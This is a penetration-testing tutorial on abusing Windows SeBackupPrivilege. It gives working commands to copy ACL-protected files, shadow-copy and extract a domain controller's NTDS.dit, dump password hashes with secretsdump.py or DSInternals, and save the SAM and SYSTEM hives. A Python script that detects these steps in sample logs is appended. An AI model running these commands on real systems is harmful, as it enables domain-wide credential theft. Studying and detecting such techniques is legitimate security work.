# Backup Operators

> Membership of this group grants its members the `SeBackup` and `SeRestore`

### SeBackup

> `SeBackupPrivilege` allows a user to bypass file and directory permission checks to perform backups. When granted, a user can read all files, regardless of the ACLs set on them, for backup purposes.

{% hint style="info" %}
We can't do this using the standard copy command. We need to programmatically copy the data, making sure to specify the [FILE\_FLAG\_BACKUP\_SEMANTICS](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea) flag.

The `FILE_FLAG_BACKUP_SEMANTICS` flag specifies that the file is being opened or created for a backup or restore operation.

If a folder or file has an explicit deny entry for our current user or a group they belong to, this will prevent us from accessing it, even if the `FILE_FLAG_BACKUP_SEMANTICS` flag is specified.
{% endhint %}

### POC

We use this POC for the attack => <https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug>

Both .dll files must be transferred to the target.

### Launching the attack

First, import the libraries from the POC:

```
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
```

Then verify whether `SeBackup` is enabled:

```
whoami /priv #cmd
Get-SeBackupPrivilege # powershell
```

If not, we enable it:

```
Set-SeBackupPrivilege
```

From there, we have several attack options:

#### A) Copying a protected file

```
Copy-FileSeBackupPrivilege C:\secrets\creds.txt .\creds.txt
```

#### B) Attacking a DC - Copying NTDS.dit

**This applies only in an Active Directory context.**

We can attempt to copy the DC database, which contains the NTLM password hashes of all domain users. We can't copy it directly with `Copy-FileSeBackupPrivilege` because the file is locked while the system is using it.

{% hint style="info" %}
We can use the Windows [diskshadow](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow) utility to create a shadow copy of the `C` drive and expose it as `E` drive. The NTDS.dit in this shadow copy won't be in use by the system.
{% endhint %}

```
PS C:\hacker> diskshadow.exe

Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC,  10/14/2020 12:57:52 AM

DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit

PS C:\htb> dir E:


    Directory: E:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         5/6/2021   1:00 PM                Confidential
d-----        9/15/2018  12:19 AM                PerfLogs
d-r---        3/24/2021   6:20 PM                Program Files
d-----        9/15/2018   2:06 AM                Program Files (x86)
d-----         5/6/2021   1:05 PM                Tools
d-r---         5/6/2021  12:51 PM                Users
d-----        3/24/2021   6:38 PM                Windows
```

Next, we can use the `Copy-FileSeBackupPrivilege` cmdlet to bypass the ACL and copy the NTDS.dit locally.

```
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
```

Now we can use a tool like `secretsdump.py` or the PowerShell `DSInternals` module to extract all Active Directory account credentials. Here we focus on the Administrator user.

With DSInternals:

```
PS C:\hacker> Import-Module .\DSInternals.psd1
PS C:\hacker> $key = Get-BootKey -SystemHivePath .\SYSTEM
PS C:\hacker> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key
```

With secretsdump.py:

```
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
```

#### C) Attacking Local Windows - **Backing up SAM and SYSTEM Registry Hives**

We can back up the SAM and SYSTEM registry hives to extract local account credentials offline using a tool such as Impacket's `secretsdump.py`.

First, we back up the hives:

```
reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV
```

#### D) Copying protected files with robocopy

It's less common, but we can also leverage robocopy to copy files in backup mode:

```
robocopy /B C:\secrets .\hacker_folder creds.txt
```

* `/B`: Runs in "Backup mode", which lets Robocopy bypass file and folder permission checks because of `SeBackupPrivilege`
* `C:\secrets`: Source directory
* `.\hacker_folder`: Destination directory
* `creds.txt`: Restricts the copy to this one file from the source directory
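As an added example that is not part of the original page, the Python sketch below shows the detection side of the procedures in sections B, C and D: it flags logons that receive `SeBackupPrivilege` for accounts outside a backup allow-list, any `diskshadow.exe` execution, `reg save` of the SAM/SYSTEM/SECURITY hives and robocopy runs in backup mode. The event records are constructed and simplified; the field names (`user`, `privs`, `proc`, `cmd`) are assumptions, not the real 4672/4688 event XML.

```python
"""Detection logic for the Backup Operators abuse paths described above.
Added example; the event records below are constructed, not real log data."""
import re

# Simplified Windows Security events: 4688 (process creation) carries the
# process path and command line, 4672 carries the privileges assigned at logon.
SAMPLE_EVENTS = [  # constructed sample data, field names are assumptions
    {"id": 4672, "user": "svc_backup", "privs": "SeBackupPrivilege SeRestorePrivilege"},
    {"id": 4672, "user": "jdoe", "privs": "SeBackupPrivilege SeRestorePrivilege"},
    {"id": 4688, "user": "jdoe", "proc": r"C:\Windows\System32\diskshadow.exe", "cmd": "diskshadow.exe"},
    {"id": 4688, "user": "jdoe", "proc": r"C:\Windows\System32\reg.exe", "cmd": r"reg save HKLM\SAM SAM.SAV"},
    {"id": 4688, "user": "jdoe", "proc": r"C:\Windows\System32\Robocopy.exe", "cmd": r"robocopy /B C:\secrets .\out creds.txt"},
    {"id": 4688, "user": "jdoe", "proc": r"C:\Windows\System32\Robocopy.exe", "cmd": r"robocopy C:\data D:\copy /E"},
    {"id": 4688, "user": "svc_backup", "proc": r"C:\Windows\System32\diskshadow.exe", "cmd": "diskshadow.exe"},
]

# "reg save HKLM\SAM ..." / "HKLM\SYSTEM" / "HKLM\SECURITY" (section C)
HIVE_SAVE = re.compile(r"\bsave\s+HKLM\\(SAM|SYSTEM|SECURITY)\b", re.IGNORECASE)
# robocopy /B or /ZB switch, i.e. backup mode (section D)
BACKUP_MODE = re.compile(r"(^|\s)/(B|ZB)(\s|$)", re.IGNORECASE)


def detect(events, allowed_backup_accounts=frozenset()):
    """Return (event_id, user, reason) tuples for activity matching the page's
    techniques, skipping accounts on the backup allow-list (expected backup jobs)."""
    allowed = {a.lower() for a in allowed_backup_accounts}
    hits = []
    for ev in events:
        user = ev["user"]
        if user.lower() in allowed:
            continue
        if ev["id"] == 4672 and "SeBackupPrivilege" in ev.get("privs", ""):
            hits.append((4672, user, "logon granted SeBackupPrivilege to non-backup account"))
        elif ev["id"] == 4688:
            exe = ev["proc"].rsplit("\\", 1)[-1].lower()
            cmd = ev.get("cmd", "")
            if exe == "diskshadow.exe":  # section B: shadow copy to reach NTDS.dit
                hits.append((4688, user, "diskshadow.exe executed"))
            elif exe == "reg.exe" and HIVE_SAVE.search(cmd):
                hits.append((4688, user, "registry hive saved: " + cmd))
            elif exe == "robocopy.exe" and BACKUP_MODE.search(cmd):
                hits.append((4688, user, "robocopy in backup mode: " + cmd))
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS, {"svc_backup"}):
        print(hit)
```

In a real deployment the same checks would be fed from the Security log (4672 and 4688 with command-line auditing enabled) rather than from the constructed list, and the allow-list would hold the accounts that legitimately run backups.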
